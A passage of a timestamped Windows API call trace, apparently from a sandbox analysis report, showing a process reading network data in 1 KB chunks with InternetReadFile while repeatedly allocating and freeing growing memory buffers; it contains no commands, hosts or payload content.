lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0124.175] VirtualFree (lpAddress=0x4bb0000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0124.176] VirtualAlloc (lpAddress=0x4b20000, dwSize=0x4c000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b20000 [0124.184] VirtualFree (lpAddress=0x4bb8000, dwSize=0x48000, dwFreeType=0x4000) returned 1 [0124.190] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0124.191] VirtualFree (lpAddress=0x4c00000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0124.191] VirtualAlloc (lpAddress=0x4b6c000, dwSize=0x4c000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b6c000 [0124.197] VirtualFree (lpAddress=0x4b20000, dwSize=0x48000, dwFreeType=0x4000) returned 1 [0124.201] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0124.202] VirtualAlloc (lpAddress=0x4bb8000, dwSize=0x4c000, flAllocationType=0x1000, flProtect=0x4) returned 0x4bb8000 [0124.210] VirtualFree (lpAddress=0x4b68000, dwSize=0x4c000, dwFreeType=0x4000) returned 1 [0124.212] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0124.213] VirtualAlloc (lpAddress=0x4b20000, dwSize=0x4c000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b20000 [0124.219] VirtualFree (lpAddress=0x4bb4000, dwSize=0x4c000, dwFreeType=0x4000) returned 1 [0124.225] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0124.225] VirtualFree (lpAddress=0x4c00000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0124.228] VirtualAlloc (lpAddress=0x4b6c000, dwSize=0x4c000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b6c000 [0124.234] VirtualFree (lpAddress=0x4b20000, dwSize=0x48000, dwFreeType=0x4000) returned 1 [0124.238] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0124.239] VirtualAlloc (lpAddress=0x4bb8000, dwSize=0x4c000, flAllocationType=0x1000, flProtect=0x4) returned 0x4bb8000 [0124.245] VirtualFree (lpAddress=0x4b68000, dwSize=0x4c000, dwFreeType=0x4000) returned 1 [0124.248] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0124.248] VirtualAlloc (lpAddress=0x4b20000, dwSize=0x4c000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b20000 [0124.257] VirtualFree (lpAddress=0x4bb4000, dwSize=0x4c000, dwFreeType=0x4000) returned 1 [0124.262] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0124.262] VirtualAlloc (lpAddress=0x4b6c000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b6c000 [0124.263] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0124.263] VirtualFree (lpAddress=0x4c00000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0124.267] VirtualAlloc (lpAddress=0x4b70000, dwSize=0x50000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b70000 [0124.272] VirtualFree (lpAddress=0x4b20000, dwSize=0x4c000, dwFreeType=0x4000) returned 1 [0124.276] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0124.276] VirtualAlloc (lpAddress=0x4bc0000, dwSize=0x50000, flAllocationType=0x1000, flProtect=0x4) returned 0x4bc0000 [0124.278] VirtualFree (lpAddress=0x4bbc000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0124.284] VirtualFree (lpAddress=0x4b6c000, dwSize=0x4c000, dwFreeType=0x4000) returned 1 [0124.287] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0124.287] VirtualFree (lpAddress=0x4bb8000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0124.288] VirtualAlloc (lpAddress=0x4b20000, dwSize=0x50000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b20000 [0124.293] VirtualFree (lpAddress=0x4bc0000, dwSize=0x4c000, dwFreeType=0x4000) returned 1 [0124.298] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0124.298] VirtualFree (lpAddress=0x4c0c000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0124.299] VirtualAlloc (lpAddress=0x4b70000, dwSize=0x50000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b70000 [0124.307] VirtualFree (lpAddress=0x4b20000, dwSize=0x4c000, dwFreeType=0x4000) returned 1 [0124.312] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0124.312] VirtualAlloc (lpAddress=0x4bc0000, dwSize=0x50000, flAllocationType=0x1000, flProtect=0x4) returned 0x4bc0000 [0124.314] VirtualFree (lpAddress=0x4bbc000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0124.325] VirtualFree (lpAddress=0x4b6c000, dwSize=0x4c000, dwFreeType=0x4000) returned 1 [0124.327] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0124.328] VirtualFree (lpAddress=0x4bb8000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0124.328] VirtualAlloc (lpAddress=0x4b20000, dwSize=0x50000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b20000 [0124.336] VirtualFree (lpAddress=0x4bc0000, dwSize=0x4c000, dwFreeType=0x4000) returned 1 [0124.341] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0124.341] VirtualFree (lpAddress=0x4c0c000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0124.342] VirtualAlloc (lpAddress=0x4b70000, dwSize=0x50000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b70000 [0124.350] VirtualFree (lpAddress=0x4b20000, dwSize=0x4c000, dwFreeType=0x4000) returned 1 [0124.355] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0124.355] VirtualAlloc (lpAddress=0x4bc0000, dwSize=0x50000, flAllocationType=0x1000, flProtect=0x4) returned 0x4bc0000 [0124.356] VirtualFree (lpAddress=0x4bbc000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0124.364] VirtualFree (lpAddress=0x4b6c000, dwSize=0x4c000, dwFreeType=0x4000) returned 1 [0124.367] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0124.367] VirtualFree (lpAddress=0x4bb8000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0124.368] VirtualAlloc (lpAddress=0x4b20000, dwSize=0x50000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b20000 [0124.377] VirtualFree (lpAddress=0x4bc0000, dwSize=0x4c000, dwFreeType=0x4000) returned 1 [0124.382] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0124.382] VirtualFree (lpAddress=0x4c0c000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0124.382] VirtualAlloc (lpAddress=0x4b70000, dwSize=0x50000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b70000 [0124.392] VirtualFree (lpAddress=0x4b20000, dwSize=0x4c000, dwFreeType=0x4000) returned 1 [0124.396] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0124.396] VirtualAlloc (lpAddress=0x4bc0000, dwSize=0x50000, flAllocationType=0x1000, flProtect=0x4) returned 0x4bc0000 [0124.404] VirtualFree (lpAddress=0x4b6c000, dwSize=0x50000, dwFreeType=0x4000) returned 1 [0124.406] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0124.407] VirtualAlloc (lpAddress=0x4b20000, dwSize=0x50000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b20000 [0124.415] VirtualFree (lpAddress=0x4bbc000, dwSize=0x50000, dwFreeType=0x4000) returned 1 [0124.422] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0124.422] VirtualFree (lpAddress=0x4c0c000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0124.425] VirtualAlloc (lpAddress=0x4b70000, dwSize=0x50000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b70000 [0124.431] VirtualFree (lpAddress=0x4b20000, dwSize=0x4c000, dwFreeType=0x4000) returned 1 [0124.435] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0124.436] VirtualAlloc (lpAddress=0x4bc0000, dwSize=0x50000, flAllocationType=0x1000, flProtect=0x4) returned 0x4bc0000 [0124.442] VirtualFree (lpAddress=0x4b6c000, dwSize=0x50000, dwFreeType=0x4000) returned 1 [0124.444] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0124.445] VirtualAlloc (lpAddress=0x4b20000, dwSize=0x50000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b20000 [0124.452] VirtualFree (lpAddress=0x4bbc000, dwSize=0x50000, dwFreeType=0x4000) returned 1 [0124.457] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0124.457] VirtualAlloc (lpAddress=0x4b70000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b70000 [0124.458] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0124.458] VirtualFree (lpAddress=0x4c0c000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0124.461] VirtualAlloc (lpAddress=0x4b74000, dwSize=0x54000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b74000 [0124.467] VirtualFree (lpAddress=0x4b20000, dwSize=0x50000, dwFreeType=0x4000) returned 1 [0124.471] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0124.471] VirtualAlloc (lpAddress=0x4bc8000, dwSize=0x54000, flAllocationType=0x1000, flProtect=0x4) returned 0x4bc8000 [0124.473] VirtualFree (lpAddress=0x4bc4000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0124.480] VirtualFree (lpAddress=0x4b70000, dwSize=0x50000, dwFreeType=0x4000) returned 1 [0124.484] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0124.484] VirtualFree (lpAddress=0x4bc0000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0124.484] VirtualAlloc (lpAddress=0x4b20000, dwSize=0x54000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b20000 [0124.499] VirtualFree (lpAddress=0x4bc8000, dwSize=0x50000, dwFreeType=0x4000) returned 1 [0124.503] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0124.504] VirtualFree (lpAddress=0x4c18000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0124.504] VirtualAlloc (lpAddress=0x4b74000, dwSize=0x54000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b74000 [0124.511] VirtualFree (lpAddress=0x4b20000, dwSize=0x50000, dwFreeType=0x4000) returned 1 [0124.515] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0124.515] VirtualAlloc (lpAddress=0x4bc8000, dwSize=0x54000, flAllocationType=0x1000, flProtect=0x4) returned 0x4bc8000 [0124.516] VirtualFree (lpAddress=0x4bc4000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0124.525] VirtualFree (lpAddress=0x4b70000, dwSize=0x50000, dwFreeType=0x4000) returned 1 [0124.527] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0124.528] VirtualFree (lpAddress=0x4bc0000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0124.528] VirtualAlloc (lpAddress=0x4b20000, dwSize=0x54000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b20000 [0124.534] VirtualFree (lpAddress=0x4bc8000, dwSize=0x50000, dwFreeType=0x4000) returned 1 [0124.538] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0124.539] VirtualFree (lpAddress=0x4c18000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0124.539] VirtualAlloc (lpAddress=0x4b74000, dwSize=0x54000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b74000 [0124.545] VirtualFree (lpAddress=0x4b20000, dwSize=0x50000, dwFreeType=0x4000) returned 1 [0124.550] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0124.550] VirtualAlloc (lpAddress=0x4bc8000, dwSize=0x54000, flAllocationType=0x1000, flProtect=0x4) returned 0x4bc8000 [0124.551] VirtualFree (lpAddress=0x4bc4000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0124.568] VirtualFree (lpAddress=0x4b70000, dwSize=0x50000, dwFreeType=0x4000) returned 1 [0124.571] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0124.573] VirtualFree (lpAddress=0x4bc0000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0124.573] VirtualAlloc (lpAddress=0x4b20000, dwSize=0x54000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b20000 [0124.579] VirtualFree (lpAddress=0x4bc8000, dwSize=0x50000, dwFreeType=0x4000) returned 1 [0124.584] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0124.584] VirtualFree (lpAddress=0x4c18000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0124.584] VirtualAlloc (lpAddress=0x4b74000, dwSize=0x54000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b74000 [0124.591] VirtualFree (lpAddress=0x4b20000, dwSize=0x50000, dwFreeType=0x4000) returned 1 [0124.595] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0124.596] VirtualAlloc (lpAddress=0x4bc8000, dwSize=0x54000, flAllocationType=0x1000, flProtect=0x4) returned 0x4bc8000 [0124.602] VirtualFree (lpAddress=0x4b70000, dwSize=0x54000, dwFreeType=0x4000) returned 1 [0124.605] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0124.606] VirtualAlloc (lpAddress=0x4b20000, dwSize=0x54000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b20000 [0124.611] VirtualFree (lpAddress=0x4bc4000, dwSize=0x54000, dwFreeType=0x4000) returned 1 [0124.618] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0124.618] VirtualFree (lpAddress=0x4c18000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0124.622] VirtualAlloc (lpAddress=0x4b74000, dwSize=0x54000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b74000 [0124.628] VirtualFree (lpAddress=0x4b20000, dwSize=0x50000, dwFreeType=0x4000) returned 1 [0124.632] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0124.633] VirtualAlloc (lpAddress=0x4bc8000, dwSize=0x54000, flAllocationType=0x1000, flProtect=0x4) returned 0x4bc8000 [0124.639] VirtualFree (lpAddress=0x4b70000, dwSize=0x54000, dwFreeType=0x4000) returned 1 [0124.641] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0124.641] VirtualAlloc (lpAddress=0x4b20000, dwSize=0x54000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b20000 [0124.646] VirtualFree (lpAddress=0x4bc4000, dwSize=0x54000, dwFreeType=0x4000) returned 1 [0124.651] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0124.651] VirtualAlloc (lpAddress=0x4b74000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b74000 [0124.652] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0124.652] VirtualFree (lpAddress=0x4c18000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0124.656] VirtualAlloc (lpAddress=0x4b78000, dwSize=0x58000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b78000 [0124.663] VirtualFree (lpAddress=0x4b20000, dwSize=0x54000, dwFreeType=0x4000) returned 1 [0124.671] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0124.671] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x4c20000 [0124.673] VirtualAlloc (lpAddress=0x4c20000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x4c20000 [0124.673] VirtualAlloc (lpAddress=0x4bd0000, dwSize=0x50000, flAllocationType=0x1000, flProtect=0x4) returned 0x4bd0000 [0124.674] VirtualFree (lpAddress=0x4bcc000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0124.681] VirtualFree (lpAddress=0x4b74000, dwSize=0x54000, dwFreeType=0x4000) returned 1 [0124.684] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0124.684] VirtualFree (lpAddress=0x4bc8000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0124.685] VirtualAlloc (lpAddress=0x4b20000, dwSize=0x58000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b20000 [0124.689] VirtualFree (lpAddress=0x4c20000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0124.698] VirtualFree (lpAddress=0x4bd0000, dwSize=0x50000, dwFreeType=0x4000) returned 1 [0124.703] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0124.703] VirtualFree (lpAddress=0x4c24000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0124.704] VirtualFree (lpAddress=0x4c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0124.704] VirtualAlloc (lpAddress=0x4b78000, dwSize=0x58000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b78000 [0124.714] VirtualFree (lpAddress=0x4b20000, dwSize=0x54000, dwFreeType=0x4000) returned 1 [0124.717] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0124.718] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x4c20000 [0124.718] VirtualAlloc (lpAddress=0x4c20000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x4c20000 [0124.718] VirtualAlloc (lpAddress=0x4bd0000, dwSize=0x50000, flAllocationType=0x1000, flProtect=0x4) returned 0x4bd0000 [0124.736] VirtualFree (lpAddress=0x4bcc000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0124.745] VirtualFree (lpAddress=0x4b74000, dwSize=0x54000, dwFreeType=0x4000) returned 1 [0124.747] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0124.747] VirtualFree (lpAddress=0x4bc8000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0124.747] VirtualAlloc (lpAddress=0x4b20000, dwSize=0x58000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b20000 [0124.754] VirtualFree (lpAddress=0x4c20000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0124.767] VirtualFree (lpAddress=0x4bd0000, dwSize=0x50000, dwFreeType=0x4000) returned 1 [0124.777] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0124.778] VirtualFree (lpAddress=0x4c24000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0124.778] VirtualFree (lpAddress=0x4c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0124.779] VirtualAlloc (lpAddress=0x4b78000, dwSize=0x58000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b78000 [0124.789] VirtualFree (lpAddress=0x4b20000, dwSize=0x54000, dwFreeType=0x4000) returned 1 [0124.797] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0124.797] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x4c20000 [0124.798] VirtualAlloc (lpAddress=0x4c20000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x4c20000 [0124.799] VirtualAlloc (lpAddress=0x4bd0000, dwSize=0x50000, flAllocationType=0x1000, flProtect=0x4) returned 0x4bd0000 [0124.801] VirtualFree (lpAddress=0x4bcc000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0124.813] VirtualFree (lpAddress=0x4b74000, dwSize=0x54000, dwFreeType=0x4000) returned 1 [0124.815] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0124.816] VirtualFree (lpAddress=0x4bc8000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0124.816] VirtualAlloc (lpAddress=0x4b20000, dwSize=0x58000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b20000 [0124.822] VirtualFree (lpAddress=0x4c20000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0124.831] VirtualFree (lpAddress=0x4bd0000, dwSize=0x50000, dwFreeType=0x4000) returned 1 [0124.837] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0124.837] VirtualFree (lpAddress=0x4c24000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0124.838] VirtualFree (lpAddress=0x4c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0124.838] VirtualAlloc (lpAddress=0x4b78000, 